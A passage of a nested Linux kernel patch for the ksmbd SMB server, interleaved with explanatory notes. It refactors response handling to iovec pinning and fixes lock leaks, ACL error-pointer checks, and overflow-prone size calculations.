+ 	    req->Channel == SMB2_CHANNEL_RDMA_V1) {
+ 		is_rdma_channel = true;
+@@ -6348,7 +6303,7 @@ int smb2_read(struct ksmbd_work *work)
+ 			goto out;
+ 	}
+ 
+-	fp = ksmbd_lookup_fd_slow(work, req->VolatileFileId, req->PersistentFileId);
++	fp = ksmbd_lookup_fd_slow(work, id, pid);
+ 	if (!fp) {
+ 		err = -ENOENT;
+ 		goto out;
+@@ -6374,21 +6329,20 @@ int smb2_read(struct ksmbd_work *work)
+ 	ksmbd_debug(SMB, "filename %pD, offset %lld, len %zu\n",
+ 		    fp->filp, offset, length);
+ 
+-	work->aux_payload_buf = kvmalloc(length, GFP_KERNEL | __GFP_ZERO);
+-	if (!work->aux_payload_buf) {
++	aux_payload_buf = kvzalloc(length, GFP_KERNEL);
++	if (!aux_payload_buf) {
+ 		err = -ENOMEM;
+ 		goto out;
+ 	}
+ 
+-	nbytes = ksmbd_vfs_read(work, fp, length, &offset);
++	nbytes = ksmbd_vfs_read(work, fp, length, &offset, aux_payload_buf);
+ 	if (nbytes < 0) {
+ 		err = nbytes;
+ 		goto out;
+ 	}
+ 
+ 	if ((nbytes == 0 && length != 0) || nbytes < mincount) {
+-		kvfree(work->aux_payload_buf);
+-		work->aux_payload_buf = NULL;
++		kvfree(aux_payload_buf);
+ 		rsp->hdr.Status = STATUS_END_OF_FILE;
+ 		smb2_set_err_rsp(work);
+ 		ksmbd_fd_put(work, fp);
+@@ -6401,11 +6355,10 @@ int smb2_read(struct ksmbd_work *work)
+ 	if (is_rdma_channel == true) {
+ 		/* write data to the client using rdma channel */
+ 		remain_bytes = smb2_read_rdma_channel(work, req,
+-						      work->aux_payload_buf,
++						      aux_payload_buf,
+ 						      nbytes);
+-		kvfree(work->aux_payload_buf);
+-		work->aux_payload_buf = NULL;
+-
++		kvfree(aux_payload_buf);
++		aux_payload_buf = NULL;
+ 		nbytes = 0;
+ 		if (remain_bytes < 0) {
+ 			err = (int)remain_bytes;
+@@ -6419,10 +6372,11 @@ int smb2_read(struct ksmbd_work *work)
+ 	rsp->DataLength = cpu_to_le32(nbytes);
+ 	rsp->DataRemaining = cpu_to_le32(remain_bytes);
+ 	rsp->Flags = 0;
+-	inc_rfc1001_len(work->response_buf, 16);
+-	work->resp_hdr_sz = get_rfc1002_len(work->response_buf) + 4;
+-	work->aux_payload_sz = nbytes;
+-	inc_rfc1001_len(work->response_buf, nbytes);
++	err = ksmbd_iov_pin_rsp_read(work, (void *)rsp,
++				     offsetof(struct smb2_read_rsp, Buffer),
++				     aux_payload_buf, nbytes);
++	if (err)
++		goto out;
+ 	ksmbd_fd_put(work, fp);
+ 	return 0;
+ 
+@@ -6505,8 +6459,8 @@ static noinline int smb2_write_pipe(struct ksmbd_work *work)
+ 	rsp->DataLength = cpu_to_le32(length);
+ 	rsp->DataRemaining = 0;
+ 	rsp->Reserved2 = 0;
+-	inc_rfc1001_len(work->response_buf, 16);
+-	return 0;
++	err = ksmbd_iov_pin_rsp(work, (void *)rsp,
++				offsetof(struct smb2_write_rsp, Buffer));
+ out:
+ 	if (err) {
+ 		rsp->hdr.Status = STATUS_INVALID_HANDLE;
+@@ -6525,7 +6479,7 @@ static ssize_t smb2_write_rdma_channel(struct ksmbd_work *work,
+ 	int ret;
+ 	ssize_t nbytes;
+ 
+-	data_buf = kvmalloc(length, GFP_KERNEL | __GFP_ZERO);
++	data_buf = kvzalloc(length, GFP_KERNEL);
+ 	if (!data_buf)
+ 		return -ENOMEM;
+ 
+@@ -6662,7 +6616,9 @@ int smb2_write(struct ksmbd_work *work)
+ 	rsp->DataLength = cpu_to_le32(nbytes);
+ 	rsp->DataRemaining = 0;
+ 	rsp->Reserved2 = 0;
+-	inc_rfc1001_len(work->response_buf, 16);
++	err = ksmbd_iov_pin_rsp(work, rsp, offsetof(struct smb2_write_rsp, Buffer));
++	if (err)
++		goto out;
+ 	ksmbd_fd_put(work, fp);
+ 	return 0;
+ 
+@@ -6709,15 +6665,11 @@ int smb2_flush(struct ksmbd_work *work)
+ 
+ 	rsp->StructureSize = cpu_to_le16(4);
+ 	rsp->Reserved = 0;
+-	inc_rfc1001_len(work->response_buf, 4);
+-	return 0;
++	return ksmbd_iov_pin_rsp(work, rsp, sizeof(struct smb2_flush_rsp));
+ 
+ out:
+-	if (err) {
+-		rsp->hdr.Status = STATUS_INVALID_HANDLE;
+-		smb2_set_err_rsp(work);
+-	}
+-
++	rsp->hdr.Status = STATUS_INVALID_HANDLE;
++	smb2_set_err_rsp(work);
+ 	return err;
+ }
+ 
+@@ -6843,7 +6795,7 @@ static int smb2_set_flock_flags(struct file_lock *flock, int flags)
+ 	case SMB2_LOCKFLAG_UNLOCK:
+ 		ksmbd_debug(SMB, "received unlock request\n");
+ 		flock->fl_type = F_UNLCK;
+-		cmd = 0;
++		cmd = F_SETLK;
+ 		break;
+ 	}
+ 
+@@ -6949,6 +6901,7 @@ int smb2_lock(struct ksmbd_work *work)
+ 		if (lock_start > U64_MAX - lock_length) {
+ 			pr_err("Invalid lock range requested\n");
+ 			rsp->hdr.Status = STATUS_INVALID_LOCK_RANGE;
++			locks_free_lock(flock);
+ 			goto out;
+ 		}
+ 
+@@ -6968,6 +6921,7 @@ int smb2_lock(struct ksmbd_work *work)
+ 				    "the end offset(%llx) is smaller than the start offset(%llx)\n",
+ 				    flock->fl_end, flock->fl_start);
+ 			rsp->hdr.Status = STATUS_INVALID_LOCK_RANGE;
++			locks_free_lock(flock);
+ 			goto out;
+ 		}
+ 
+@@ -6979,6 +6933,7 @@ int smb2_lock(struct ksmbd_work *work)
+ 				    flock->fl_type != F_UNLCK) {
+ 					pr_err("conflict two locks in one request\n");
+ 					err = -EINVAL;
++					locks_free_lock(flock);
+ 					goto out;
+ 				}
+ 			}
+@@ -6987,6 +6942,7 @@ int smb2_lock(struct ksmbd_work *work)
+ 		smb_lock = smb2_lock_init(flock, cmd, flags, &lock_list);
+ 		if (!smb_lock) {
+ 			err = -EINVAL;
++			locks_free_lock(flock);
+ 			goto out;
+ 		}
+ 	}
+@@ -7118,10 +7074,6 @@ skip:
+ 
+ 				ksmbd_debug(SMB,
+ 					    "would have to wait for getting lock\n");
+-				spin_lock(&work->conn->llist_lock);
+-				list_add_tail(&smb_lock->clist,
+-					      &work->conn->lock_list);
+-				spin_unlock(&work->conn->llist_lock);
+ 				list_add(&smb_lock->llist, &rollback_list);
+ 
+ 				argv = kmalloc(sizeof(void *), GFP_KERNEL);
+@@ -7147,19 +7099,12 @@ skip:
+ 
+ 				ksmbd_vfs_posix_lock_wait(flock);
+ 
+-				spin_lock(&work->conn->request_lock);
+ 				spin_lock(&fp->f_lock);
+ 				list_del(&work->fp_entry);
+-				work->cancel_fn = NULL;
+-				kfree(argv);
+ 				spin_unlock(&fp->f_lock);
+-				spin_unlock(&work->conn->request_lock);
+ 
+ 				if (work->state != KSMBD_WORK_ACTIVE) {
+ 					list_del(&smb_lock->llist);
+-					spin_lock(&work->conn->llist_lock);
+-					list_del(&smb_lock->clist);
+-					spin_unlock(&work->conn->llist_lock);
+ 					locks_free_lock(flock);
+ 
+ 					if (work->state == KSMBD_WORK_CANCELLED) {
+@@ -7171,8 +7116,7 @@ skip:
+ 						work->send_no_response = 1;
+ 						goto out;
+ 					}
+-					init_smb2_rsp_hdr(work);
+-					smb2_set_err_rsp(work);
++
+ 					rsp->hdr.Status =
+ 						STATUS_RANGE_NOT_LOCKED;
+ 					kfree(smb_lock);
+@@ -7180,19 +7124,16 @@ skip:
+ 				}
+ 
+ 				list_del(&smb_lock->llist);
+-				spin_lock(&work->conn->llist_lock);
+-				list_del(&smb_lock->clist);
+-				spin_unlock(&work->conn->llist_lock);
+-
++				release_async_work(work);
+ 				goto retry;
+ 			} else if (!rc) {
++				list_add(&smb_lock->llist, &rollback_list);
+ 				spin_lock(&work->conn->llist_lock);
+ 				list_add_tail(&smb_lock->clist,
+ 					      &work->conn->lock_list);
+ 				list_add_tail(&smb_lock->flist,
+ 					      &fp->lock_list);
+ 				spin_unlock(&work->conn->llist_lock);
+-				list_add(&smb_lock->llist, &rollback_list);
+ 				ksmbd_debug(SMB, "successful in taking lock\n");
+ 			} else {
+ 				goto out;
+@@ -7207,7 +7148,10 @@ skip:
+ 	ksmbd_debug(SMB, "successful in taking lock\n");
+ 	rsp->hdr.Status = STATUS_SUCCESS;
+ 	rsp->Reserved = 0;
+-	inc_rfc1001_len(work->response_buf, 4);
++	err = ksmbd_iov_pin_rsp(work, rsp, sizeof(struct smb2_lock_rsp));
++	if (err)
++		goto out;
++
+ 	ksmbd_fd_put(work, fp);
+ 	return 0;
+ 
+@@ -7226,7 +7170,7 @@ out:
+ 		rlock->fl_start = smb_lock->start;
+ 		rlock->fl_end = smb_lock->end;
+ 
+-		rc = vfs_lock_file(filp, 0, rlock, NULL);
++		rc = vfs_lock_file(filp, F_SETLK, rlock, NULL);
+ 		if (rc)
+ 			pr_err("rollback unlock fail : %d\n", rc);
+ 
+@@ -7648,7 +7592,8 @@ static inline int fsctl_set_sparse(struct ksmbd_work *work, u64 id,
+ 
+ 		da.attr = le32_to_cpu(fp->f_ci->m_fattr);
+ 		ret = ksmbd_vfs_set_dos_attrib_xattr(user_ns,
+-						     fp->filp->f_path.dentry, &da);
++						     &fp->filp->f_path,
++						     &da, true);
+ 		if (ret)
+ 			fp->f_ci->m_fattr = old_fattr;
+ 	}
+@@ -8003,9 +7948,9 @@ dup_ext_out:
+ 	rsp->Reserved = cpu_to_le16(0);
+ 	rsp->Flags = cpu_to_le32(0);
+ 	rsp->Reserved2 = cpu_to_le32(0);
+-	inc_rfc1001_len(work->response_buf, 48 + nbytes);
+-
+-	return 0;
++	ret = ksmbd_iov_pin_rsp(work, rsp, sizeof(struct smb2_ioctl_rsp) + nbytes);
++	if (!ret)
++		return ret;
+ 
+ out:
+ 	if (ret == -EACCES)
+@@ -8140,8 +8085,9 @@ static void smb20_oplock_break_ack(struct ksmbd_work *work)
+ 	rsp->Reserved2 = 0;
+ 	rsp->VolatileFid = volatile_id;
+ 	rsp->PersistentFid = persistent_id;
+-	inc_rfc1001_len(work->response_buf, 24);
+-	return;
++	ret = ksmbd_iov_pin_rsp(work, rsp, sizeof(struct smb2_oplock_break));
++	if (!ret)
++		return;
+ 
+ err_out:
+ 	opinfo->op_state = OPLOCK_STATE_NONE;
+@@ -8273,6 +8219,11 @@ static void smb21_lease_break_ack(struct ksmbd_work *work)
+ 			    le32_to_cpu(req->LeaseState));
+ 	}
+ 
++	if (ret < 0) {
++		rsp->hdr.Status = err;
++		goto err_out;
++	}
++
+ 	lease_state = lease->state;
+ 	opinfo->op_state = OPLOCK_STATE_NONE;
+ 	wake_up_interruptible_all(&opinfo->oplock_q);
+@@ -8280,22 +8231,17 @@ static void smb21_lease_break_ack(struct ksmbd_work *work)
+ 	wake_up_interruptible_all(&opinfo->oplock_brk);
+ 	opinfo_put(opinfo);
+ 
+-	if (ret < 0) {
+-		rsp->hdr.Status = err;
+-		goto err_out;
+-	}
+-
+ 	rsp->StructureSize = cpu_to_le16(36);
+ 	rsp->Reserved = 0;
+ 	rsp->Flags = 0;
+ 	memcpy(rsp->LeaseKey, req->LeaseKey, 16);
+ 	rsp->LeaseState = lease_state;
+ 	rsp->LeaseDuration = 0;
+-	inc_rfc1001_len(work->response_buf, 36);
+-	return;
++	ret = ksmbd_iov_pin_rsp(work, rsp, sizeof(struct smb2_lease_ack));
++	if (!ret)
++		return;
+ 
+ err_out:
+-	opinfo->op_state = OPLOCK_STATE_NONE;
+ 	wake_up_interruptible_all(&opinfo->oplock_q);
+ 	atomic_dec(&opinfo->breaking_cnt);
+ 	wake_up_interruptible_all(&opinfo->oplock_brk);
+@@ -8430,43 +8376,19 @@ int smb2_check_sign_req(struct ksmbd_work *work)
+ void smb2_set_sign_rsp(struct ksmbd_work *work)
+ {
+ 	struct smb2_hdr *hdr;
+-	struct smb2_hdr *req_hdr;
+ 	char signature[SMB2_HMACSHA256_SIZE];
+-	struct kvec iov[2];
+-	size_t len;
++	struct kvec *iov;
+ 	int n_vec = 1;
+ 
+-	hdr = smb2_get_msg(work->response_buf);
+-	if (work->next_smb2_rsp_hdr_off)
+-		hdr = ksmbd_resp_buf_next(work);
+-
+-	req_hdr = ksmbd_req_buf_next(work);
+-
+-	if (!work->next_smb2_rsp_hdr_off) {
+-		len = get_rfc1002_len(work->response_buf);
+-		if (req_hdr->NextCommand)
+-			len = ALIGN(len, 8);
+-	} else {
+-		len = get_rfc1002_len(work->response_buf) -
+-			work->next_smb2_rsp_hdr_off;
+-		len = ALIGN(len, 8);
+-	}
+-
+-	if (req_hdr->NextCommand)
+-		hdr->NextCommand = cpu_to_le32(len);
+-
++	hdr = ksmbd_resp_buf_curr(work);
+ 	hdr->Flags |= SMB2_FLAGS_SIGNED;
+ 	memset(hdr->Signature, 0, SMB2_SIGNATURE_SIZE);
+ 
+-	iov[0].iov_base = (char *)&hdr->ProtocolId;
+-	iov[0].iov_len = len;
+-
+-	if (work->aux_payload_sz) {
+-		iov[0].iov_len -= work->aux_payload_sz;
+-
+-		iov[1].iov_base = work->aux_payload_buf;
+-		iov[1].iov_len = work->aux_payload_sz;
++	if (hdr->Command == SMB2_READ) {
++		iov = &work->iov[work->iov_idx - 1];
+ 		n_vec++;
++	} else {
++		iov = &work->iov[work->iov_idx];
+ 	}
+ 
+ 	if (!ksmbd_sign_smb2_pdu(work->conn, work->sess->sess_key, iov, n_vec,
+@@ -8542,29 +8464,14 @@ int smb3_check_sign_req(struct ksmbd_work *work)
+ void smb3_set_sign_rsp(struct ksmbd_work *work)
+ {
+ 	struct ksmbd_conn *conn = work->conn;
+-	struct smb2_hdr *req_hdr, *hdr;
++	struct smb2_hdr *hdr;
+ 	struct channel *chann;
+ 	char signature[SMB2_CMACAES_SIZE];
+-	struct kvec iov[2];
++	struct kvec *iov;
+ 	int n_vec = 1;
+-	size_t len;
+ 	char *signing_key;
+ 
+-	hdr = smb2_get_msg(work->response_buf);
+-	if (work->next_smb2_rsp_hdr_off)
+-		hdr = ksmbd_resp_buf_next(work);
+-
+-	req_hdr = ksmbd_req_buf_next(work);
+-
+-	if (!work->next_smb2_rsp_hdr_off) {
+-		len = get_rfc1002_len(work->response_buf);
+-		if (req_hdr->NextCommand)
+-			len = ALIGN(len, 8);
+-	} else {
+-		len = get_rfc1002_len(work->response_buf) -
+-			work->next_smb2_rsp_hdr_off;
+-		len = ALIGN(len, 8);
+-	}
++	hdr = ksmbd_resp_buf_curr(work);
+ 
+ 	if (conn->binding == false &&
+ 	    le16_to_cpu(hdr->Command) == SMB2_SESSION_SETUP_HE) {
+@@ -8580,21 +8487,18 @@ void smb3_set_sign_rsp(struct ksmbd_work *work)
+ 	if (!signing_key)
+ 		return;
+ 
+-	if (req_hdr->NextCommand)
+-		hdr->NextCommand = cpu_to_le32(len);
+-
+ 	hdr->Flags |= SMB2_FLAGS_SIGNED;
+ 	memset(hdr->Signature, 0, SMB2_SIGNATURE_SIZE);
+-	iov[0].iov_base = (char *)&hdr->ProtocolId;
+-	iov[0].iov_len = len;
+-	if (work->aux_payload_sz) {
+-		iov[0].iov_len -= work->aux_payload_sz;
+-		iov[1].iov_base = work->aux_payload_buf;
+-		iov[1].iov_len = work->aux_payload_sz;
++
++	if (hdr->Command == SMB2_READ) {
++		iov = &work->iov[work->iov_idx - 1];
+ 		n_vec++;
++	} else {
++		iov = &work->iov[work->iov_idx];
+ 	}
+ 
+-	if (!ksmbd_sign_smb3_pdu(conn, signing_key, iov, n_vec, signature))
++	if (!ksmbd_sign_smb3_pdu(conn, signing_key, iov, n_vec,
++				 signature))
+ 		memcpy(hdr->Signature, signature, SMB2_SIGNATURE_SIZE);
+ }
+ 
+@@ -8661,45 +8565,22 @@ static void fill_transform_hdr(void *tr_buf, char *old_buf, __le16 cipher_type)
+ 
+ int smb3_encrypt_resp(struct ksmbd_work *work)
+ {
+-	char *buf = work->response_buf;
+-	struct kvec iov[3];
++	struct kvec *iov = work->iov;
+ 	int rc = -ENOMEM;
+-	int buf_size = 0, rq_nvec = 2 + (work->aux_payload_sz ? 1 : 0);
+-
+-	if (ARRAY_SIZE(iov) < rq_nvec)
+-		return -ENOMEM;
++	void *tr_buf;
+ 
+-	work->tr_buf = kzalloc(sizeof(struct smb2_transform_hdr) + 4, GFP_KERNEL);
+-	if (!work->tr_buf)
++	tr_buf = kzalloc(sizeof(struct smb2_transform_hdr) + 4, GFP_KERNEL);
++	if (!tr_buf)
+ 		return rc;
+ 
+ 	/* fill transform header */
+-	fill_transform_hdr(work->tr_buf, buf, work->conn->cipher_type);
++	fill_transform_hdr(tr_buf, work->response_buf, work->conn->cipher_type);
+ 
+-	iov[0].iov_base = work->tr_buf;
++	iov[0].iov_base = tr_buf;
+ 	iov[0].iov_len = sizeof(struct smb2_transform_hdr) + 4;
+-	buf_size += iov[0].iov_len - 4;
+-
+-	iov[1].iov_base = buf + 4;
+-	iov[1].iov_len = get_rfc1002_len(buf);
+-	if (work->aux_payload_sz) {
+-		iov[1].iov_len = work->resp_hdr_sz - 4;
+-
+-		iov[2].iov_base = work->aux_payload_buf;
+-		iov[2].iov_len = work->aux_payload_sz;
+-		buf_size += iov[2].iov_len;
+-	}
+-	buf_size += iov[1].iov_len;
+-	work->resp_hdr_sz = iov[1].iov_len;
+-
+-	rc = ksmbd_crypt_message(work, iov, rq_nvec, 1);
+-	if (rc)
+-		return rc;
+-
+-	memmove(buf, iov[1].iov_base, iov[1].iov_len);
+-	*(__be32 *)work->tr_buf = cpu_to_be32(buf_size);
++	work->tr_buf = tr_buf;
+ 
+-	return rc;
++	return ksmbd_crypt_message(work, iov, work->iov_idx + 1, 1);
+ }
+ 
+ bool smb3_is_transform_hdr(void *buf)
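The common thread in the smb2pdu.c hunks above is that inc_rfc1001_len()
bookkeeping on one flat response buffer is replaced by pinning each response
chunk into a per-work kvec array, which signing (smb2_set_sign_rsp,
smb3_set_sign_rsp) and encryption (smb3_encrypt_resp) then walk directly. A
simplified sketch of the shape of such a pin helper; the real
ksmbd_iov_pin_rsp()/ksmbd_iov_pin_rsp_read() also handle read payloads and
compounded responses:

    struct work_iov_sketch {
            struct kvec iov[8];     /* header + payload chunks */
            int iov_idx;            /* next free slot */
    };

    /* Append one @len-byte response chunk; the transport later sends the
     * whole vector, so no flat buffer length needs patching afterwards. */
    static int iov_pin_rsp_sketch(struct work_iov_sketch *w,
                                  void *rsp, size_t len)
    {
            if (w->iov_idx >= ARRAY_SIZE(w->iov))
                    return -ENOMEM;
            w->iov[w->iov_idx].iov_base = rsp;
            w->iov[w->iov_idx].iov_len = len;
            w->iov_idx++;
            return 0;
    }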
+diff --git a/fs/smb/server/smb2pdu.h b/fs/smb/server/smb2pdu.h
+index 665a837378540..59e3de95961c1 100644
+--- a/fs/smb/server/smb2pdu.h
++++ b/fs/smb/server/smb2pdu.h
+@@ -446,7 +446,7 @@ struct smb2_posix_info {
+ 	/* SidBuffer contain two sids (UNIX user sid(16), UNIX group sid(16)) */
+ 	u8 SidBuffer[32];
+ 	__le32 name_len;
+-	u8 name[1];
++	u8 name[];
+ 	/*
+ 	 * var sized owner SID
+ 	 * var sized group SID
+@@ -488,6 +488,7 @@ int find_matching_smb2_dialect(int start_index, __le16 *cli_dialects,
+ struct file_lock *smb_flock_init(struct file *f);
+ int setup_async_work(struct ksmbd_work *work, void (*fn)(void **),
+ 		     void **arg);
++void release_async_work(struct ksmbd_work *work);
+ void smb2_send_interim_resp(struct ksmbd_work *work, __le32 status);
+ struct channel *lookup_chann_list(struct ksmbd_session *sess,
+ 				  struct ksmbd_conn *conn);
+diff --git a/fs/smb/server/smb_common.c b/fs/smb/server/smb_common.c
+index adc41b57b84c6..d160363c09ebc 100644
+--- a/fs/smb/server/smb_common.c
++++ b/fs/smb/server/smb_common.c
+@@ -266,7 +266,7 @@ static int ksmbd_negotiate_smb_dialect(void *buf)
+ 		if (smb2_neg_size > smb_buf_length)
+ 			goto err_out;
+ 
+-		if (smb2_neg_size + le16_to_cpu(req->DialectCount) * sizeof(__le16) >
++		if (struct_size(req, Dialects, le16_to_cpu(req->DialectCount)) >
+ 		    smb_buf_length)
+ 			goto err_out;
+ 
+@@ -319,12 +319,6 @@ static int init_smb1_rsp_hdr(struct ksmbd_work *work)
+ 	struct smb_hdr *rsp_hdr = (struct smb_hdr *)work->response_buf;
+ 	struct smb_hdr *rcv_hdr = (struct smb_hdr *)work->request_buf;
+ 
+-	/*
+-	 * Remove 4 byte direct TCP header.
+-	 */
+-	*(__be32 *)work->response_buf =
+-		cpu_to_be32(sizeof(struct smb_hdr) - 4);
+-
+ 	rsp_hdr->Command = SMB_COM_NEGOTIATE;
+ 	*(__le32 *)rsp_hdr->Protocol = SMB1_PROTO_NUMBER;
+ 	rsp_hdr->Flags = SMBFLG_RESPONSE;
+@@ -359,8 +353,8 @@ static int smb1_check_user_session(struct ksmbd_work *work)
+  */
+ static int smb1_allocate_rsp_buf(struct ksmbd_work *work)
+ {
+-	work->response_buf = kmalloc(MAX_CIFS_SMALL_BUFFER_SIZE,
+-			GFP_KERNEL | __GFP_ZERO);
++	work->response_buf = kzalloc(MAX_CIFS_SMALL_BUFFER_SIZE,
++			GFP_KERNEL);
+ 	work->response_sz = MAX_CIFS_SMALL_BUFFER_SIZE;
+ 
+ 	if (!work->response_buf) {
+@@ -571,10 +565,11 @@ static int smb_handle_negotiate(struct ksmbd_work *work)
+ 
+ 	ksmbd_debug(SMB, "Unsupported SMB1 protocol\n");
+ 
+-	/* Add 2 byte bcc and 2 byte DialectIndex. */
+-	inc_rfc1001_len(work->response_buf, 4);
+-	neg_rsp->hdr.Status.CifsError = STATUS_SUCCESS;
++	if (ksmbd_iov_pin_rsp(work, (void *)neg_rsp,
++			      sizeof(struct smb_negotiate_rsp) - 4))
++		return -ENOMEM;
+ 
++	neg_rsp->hdr.Status.CifsError = STATUS_SUCCESS;
+ 	neg_rsp->hdr.WordCount = 1;
+ 	neg_rsp->DialectIndex = cpu_to_le16(work->conn->dialect);
+ 	neg_rsp->ByteCount = 0;
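The negotiate fix above swaps an open-coded size computation for
struct_size(), which adds the trailing-array bytes with overflow checking so
a huge DialectCount cannot wrap the comparison. A userspace approximation
built on the same GCC/Clang builtins (struct and helper names invented for
illustration):

    #include <stdbool.h>
    #include <stddef.h>
    #include <stdint.h>

    struct neg_req {
            uint16_t dialect_count;
            uint16_t dialects[];    /* flexible array member */
    };

    /* Like the kernel's struct_size(): header plus count * element size,
     * saturating to SIZE_MAX on overflow so the subsequent "> buf_len"
     * comparison always fails safely. */
    static size_t neg_req_size(size_t count)
    {
            size_t bytes;

            if (__builtin_mul_overflow(count, sizeof(uint16_t), &bytes) ||
                __builtin_add_overflow(bytes, sizeof(struct neg_req), &bytes))
                    return SIZE_MAX;
            return bytes;
    }

    static bool neg_req_fits(size_t count, size_t buf_len)
    {
            return neg_req_size(count) <= buf_len;
    }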
+diff --git a/fs/smb/server/smb_common.h b/fs/smb/server/smb_common.h
+index 1cbb492cdefec..f1092519c0c28 100644
+--- a/fs/smb/server/smb_common.h
++++ b/fs/smb/server/smb_common.h
+@@ -200,7 +200,7 @@ struct smb_hdr {
+ struct smb_negotiate_req {
+ 	struct smb_hdr hdr;     /* wct = 0 */
+ 	__le16 ByteCount;
+-	unsigned char DialectsArray[1];
++	unsigned char DialectsArray[];
+ } __packed;
+ 
+ struct smb_negotiate_rsp {
+@@ -263,14 +263,14 @@ struct file_directory_info {
+ 	__le64 AllocationSize;
+ 	__le32 ExtFileAttributes;
+ 	__le32 FileNameLength;
+-	char FileName[1];
++	char FileName[];
+ } __packed;   /* level 0x101 FF resp data */
+ 
+ struct file_names_info {
+ 	__le32 NextEntryOffset;
+ 	__u32 FileIndex;
+ 	__le32 FileNameLength;
+-	char FileName[1];
++	char FileName[];
+ } __packed;   /* level 0xc FF resp data */
+ 
+ struct file_full_directory_info {
+@@ -285,7 +285,7 @@ struct file_full_directory_info {
+ 	__le32 ExtFileAttributes;
+ 	__le32 FileNameLength;
+ 	__le32 EaSize;
+-	char FileName[1];
++	char FileName[];
+ } __packed; /* level 0x102 FF resp */
+ 
+ struct file_both_directory_info {
+@@ -303,7 +303,7 @@ struct file_both_directory_info {
+ 	__u8   ShortNameLength;
+ 	__u8   Reserved;
+ 	__u8   ShortName[24];
+-	char FileName[1];
++	char FileName[];
+ } __packed; /* level 0x104 FFrsp data */
+ 
+ struct file_id_both_directory_info {
+@@ -323,7 +323,7 @@ struct file_id_both_directory_info {
+ 	__u8   ShortName[24];
+ 	__le16 Reserved2;
+ 	__le64 UniqueId;
+-	char FileName[1];
++	char FileName[];
+ } __packed;
+ 
+ struct file_id_full_dir_info {
+@@ -340,7 +340,7 @@ struct file_id_full_dir_info {
+ 	__le32 EaSize; /* EA size */
+ 	__le32 Reserved;
+ 	__le64 UniqueId; /* inode num - le since Samba puts ino in low 32 bit*/
+-	char FileName[1];
++	char FileName[];
+ } __packed; /* level 0x105 FF rsp data */
+ 
+ struct smb_version_values {
+diff --git a/fs/smb/server/smbacl.c b/fs/smb/server/smbacl.c
+index c24df86eb112b..d9bbd2eb89c35 100644
+--- a/fs/smb/server/smbacl.c
++++ b/fs/smb/server/smbacl.c
+@@ -97,7 +97,7 @@ int compare_sids(const struct smb_sid *ctsid, const struct smb_sid *cwsid)
+ 	/* compare all of the subauth values if any */
+ 	num_sat = ctsid->num_subauth;
+ 	num_saw = cwsid->num_subauth;
+-	num_subauth = num_sat < num_saw ? num_sat : num_saw;
++	num_subauth = min(num_sat, num_saw);
+ 	if (num_subauth) {
+ 		for (i = 0; i < num_subauth; ++i) {
+ 			if (ctsid->sub_auth[i] != cwsid->sub_auth[i]) {
+@@ -1185,8 +1185,7 @@ pass:
+ 			pntsd_size += sizeof(struct smb_acl) + nt_size;
+ 		}
+ 
+-		ksmbd_vfs_set_sd_xattr(conn, user_ns,
+-				       path->dentry, pntsd, pntsd_size);
++		ksmbd_vfs_set_sd_xattr(conn, user_ns, path, pntsd, pntsd_size, false);
+ 		kfree(pntsd);
+ 	}
+ 
+@@ -1313,7 +1312,7 @@ int smb_check_perm_dacl(struct ksmbd_conn *conn, const struct path *path,
+ 
+ 	if (IS_ENABLED(CONFIG_FS_POSIX_ACL)) {
+ 		posix_acls = get_acl(d_inode(path->dentry), ACL_TYPE_ACCESS);
+-		if (posix_acls && !found) {
++		if (!IS_ERR_OR_NULL(posix_acls) && !found) {
+ 			unsigned int id = -1;
+ 
+ 			pa_entry = posix_acls->a_entries;
+@@ -1337,7 +1336,7 @@ int smb_check_perm_dacl(struct ksmbd_conn *conn, const struct path *path,
+ 				}
+ 			}
+ 		}
+-		if (posix_acls)
++		if (!IS_ERR_OR_NULL(posix_acls))
+ 			posix_acl_release(posix_acls);
+ 	}
+ 
+@@ -1378,7 +1377,7 @@ err_out:
+ 
+ int set_info_sec(struct ksmbd_conn *conn, struct ksmbd_tree_connect *tcon,
+ 		 const struct path *path, struct smb_ntsd *pntsd, int ntsd_len,
+-		 bool type_check)
++		 bool type_check, bool get_write)
+ {
+ 	int rc;
+ 	struct smb_fattr fattr = {{0}};
+@@ -1406,7 +1405,7 @@ int set_info_sec(struct ksmbd_conn *conn, struct ksmbd_tree_connect *tcon,
+ 	newattrs.ia_valid |= ATTR_MODE;
+ 	newattrs.ia_mode = (inode->i_mode & ~0777) | (fattr.cf_mode & 0777);
+ 
+-	ksmbd_vfs_remove_acl_xattrs(user_ns, path->dentry);
++	ksmbd_vfs_remove_acl_xattrs(user_ns, path);
+ 	/* Update posix acls */
+ 	if (IS_ENABLED(CONFIG_FS_POSIX_ACL) && fattr.cf_dacls) {
+ 		rc = set_posix_acl(user_ns, inode,
+@@ -1437,15 +1436,14 @@ int set_info_sec(struct ksmbd_conn *conn, struct ksmbd_tree_connect *tcon,
+ 
+ 	if (test_share_config_flag(tcon->share_conf, KSMBD_SHARE_FLAG_ACL_XATTR)) {
+ 		/* Update WinACL in xattr */
+-		ksmbd_vfs_remove_sd_xattrs(user_ns, path->dentry);
+-		ksmbd_vfs_set_sd_xattr(conn, user_ns,
+-				       path->dentry, pntsd, ntsd_len);
++		ksmbd_vfs_remove_sd_xattrs(user_ns, path);
++		ksmbd_vfs_set_sd_xattr(conn, user_ns, path, pntsd, ntsd_len,
++				get_write);
+ 	}
+ 
+ out:
+ 	posix_acl_release(fattr.cf_acls);
+ 	posix_acl_release(fattr.cf_dacls);
+-	mark_inode_dirty(inode);
+ 	return rc;
+ }
+ 
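The posix_acls checks above matter because get_acl() has three outcomes: a valid ACL, NULL (no ACL set), or an ERR_PTR such as -EOPNOTSUPP from filesystems without ACL support. The old "if (posix_acls)" test treated an error pointer as a usable ACL. The defensive pattern, sketched:

struct posix_acl *acls = get_acl(inode, ACL_TYPE_ACCESS);

if (IS_ERR_OR_NULL(acls))
        return;                 /* error pointer and "no ACL" both mean skip */

/* ... walk acls->a_entries[0 .. acls->a_count) ... */

posix_acl_release(acls);        /* release only a real ACL reference */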
+diff --git a/fs/smb/server/smbacl.h b/fs/smb/server/smbacl.h
+index 618f2e0236b31..9651a25518881 100644
+--- a/fs/smb/server/smbacl.h
++++ b/fs/smb/server/smbacl.h
+@@ -207,7 +207,7 @@ int smb_check_perm_dacl(struct ksmbd_conn *conn, const struct path *path,
+ 			__le32 *pdaccess, int uid);
+ int set_info_sec(struct ksmbd_conn *conn, struct ksmbd_tree_connect *tcon,
+ 		 const struct path *path, struct smb_ntsd *pntsd, int ntsd_len,
+-		 bool type_check);
++		 bool type_check, bool get_write);
+ void id_to_sid(unsigned int cid, uint sidtype, struct smb_sid *ssid);
+ void ksmbd_init_domain(u32 *sub_auth);
+ 
